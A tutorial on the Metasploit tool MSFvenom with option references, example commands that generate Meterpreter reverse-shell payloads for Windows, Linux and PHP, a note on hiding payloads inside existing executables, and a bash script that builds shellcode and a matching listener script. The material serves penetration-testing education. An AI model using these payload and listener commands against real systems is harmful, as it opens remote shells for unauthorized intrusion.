MSFvenom is the standalone command-line payload generator that ships with the Metasploit Framework. It is used to generate, encode, and customize payloads for penetration testing and ethical hacking. On June 8, 2015 it replaced the older msfpayload and msfencode tools, combining their functionality into a single tool that no longer has to load the framework twice. It supports a wide range of target platforms, including Windows, Linux, Android, and macOS.

Core Functionalities and Features

  • Payload Generation:
    • Creates raw shellcode or ready-to-run files in many output formats (e.g., .exe, .elf, .php, .war) for a chosen payload such as a Meterpreter stager or a plain reverse shell.
  • Encoding:
    • Transforms the payload bytes with an encoder such as x86/shikata_ga_nai. The main reason to encode is to avoid bad characters; encoded output from the stock encoders is well known to antivirus (AV) engines, so encoding alone should not be relied on for evasion.
  • Platform Support:
    • Supports many platforms, including Windows, Linux, Android, Cisco, and Node.js (list them with --list platforms).
  • Custom Templates:
    • Injects the payload into an existing executable supplied with the -x flag; adding -k keeps the template's original behaviour so the host program still appears to run normally.
  • Bad Character Removal:
    • Excludes bytes that would break the payload in its delivery context, such as \x00 (null byte) in a string-based overflow. Passing -b makes msfvenom pick an encoder automatically if none is given.

Key Command Options

  • -p, --payload: Specifies the payload to use.
  • -l, --list: Lists modules of a given type (payloads, encoders, formats, platforms, archs).
  • -f, --format: Specifies the output format (e.g., exe, raw, elf, php). List them with --list formats.
  • -e, --encoder: Selects the encoder to use.
  • -i, --iterations: Number of times to run the encoder.
  • -a, --arch: Specifies the architecture (e.g., x86, x64).
  • --platform: Specifies the target platform.
  • -x, --template: Uses an existing executable as the container for the payload.
  • -k, --keep: Keeps the template's original functionality when used with -x.
  • -o, --out: Saves the payload to a file instead of standard output.
  • -b, --bad-chars: List of bytes to avoid, written as escapes such as '\x00\x0a'.

Common Examples

  • Windows x64 Meterpreter Reverse TCP (staged, PE executable):
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o shell.exe
  • Linux x86 Meterpreter Reverse TCP (staged, ELF executable):
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
  • PHP Meterpreter Reverse TCP (raw script, upload as .php):
    msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
  • Encoded Payload (five passes of shikata_ga_nai):
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -i 5 -f exe > encoded_shell.exe
    Expect this to be flagged by current AV products; shikata_ga_nai output is heavily signatured and extra iterations do not change that. Encoding is mainly useful for satisfying bad-character constraints.

Use in Penetration Testing 

  1. Generate Payload: Create the payload file with msfvenom, noting the exact payload name, LHOST and LPORT used.
  2. Setup Listener: In msfconsole, use exploit/multi/handler and set PAYLOAD, LHOST and LPORT to the same values; a staged payload will not complete if the handler's payload does not match.
  3. Execute: Deliver and execute the payload on the target system; the reverse connection arrives at the handler.
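The three steps above as one script. This is an added example, not a script from the original page or from the Metasploit project: the payload, LHOST and LPORT values are placeholders, the bad-character list is an assumption, and msfvenom is only invoked when it is on PATH. Two things it adds that the bare commands do not: it scans the generated bytes to confirm the encoder really removed every bad character, and it writes the multi/handler resource script from the same variables so the listener cannot drift from the payload that was generated.

```shell
#!/usr/bin/env bash
# Added example (not from the original page). Assumed values below.
set -u

PAYLOAD="${PAYLOAD:-windows/x64/meterpreter/reverse_tcp}"
LHOST="${LHOST:-10.10.14.5}"        # assumed attacker address
LPORT="${LPORT:-4444}"
BAD_CHARS='\x00\x0a\x0d'            # assumed: NUL, LF, CR must not appear

# Step 1: generate raw shellcode, asking msfvenom to avoid BAD_CHARS.
gen_payload() {
  local out="$1"
  msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" \
    -b "$BAD_CHARS" -f raw -o "$out"
}

# Verify the output instead of trusting the encoder: dump the file as
# two-digit hex, one byte per line, and count each forbidden value.
# Returns 0 when clean, 1 when any bad byte is present (reported on stderr).
check_bad_chars() {
  local file="$1" bad="$2" code n rc=0
  # '\x00\x0a' -> '00 0a' (lowercase to match od's output)
  for code in $(printf '%s' "$bad" | sed 's/\\x/ /g' | tr 'A-F' 'a-f'); do
    n=$(od -An -v -tx1 "$file" | tr -s ' \n' '\n' | grep -c "^${code}$" || true)
    if [ "$n" -gt 0 ]; then
      echo "bad char \\x$code occurs $n time(s) in $file" >&2
      rc=1
    fi
  done
  return "$rc"
}

# Step 2: handler resource script built from the SAME variables as step 1,
# so PAYLOAD/LHOST/LPORT on the listener match the generated file exactly.
write_handler_rc() {
  local rc="$1"
  cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
}

main() {
  local dir
  dir=$(mktemp -d)
  if command -v msfvenom >/dev/null 2>&1; then
    gen_payload "$dir/payload.bin"
    if ! check_bad_chars "$dir/payload.bin" "$BAD_CHARS"; then
      echo "bad characters survived; retry with another -e or more -i" >&2
      exit 1
    fi
    echo "payload written to $dir/payload.bin"
  else
    echo "msfvenom not found on PATH; skipping payload generation" >&2
  fi
  write_handler_rc "$dir/handler.rc"
  # Step 3 is delivery; start the listener first, then run the payload.
  echo "start the listener with: msfconsole -q -r $dir/handler.rc"
}

main "$@"
```

check_bad_chars only needs od, tr, sed and grep, so it can be run on any raw blob, including shellcode produced by something other than msfvenom. The handler script sets ExitOnSession false and runs the handler as a background job so repeated callbacks are accepted without restarting it.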
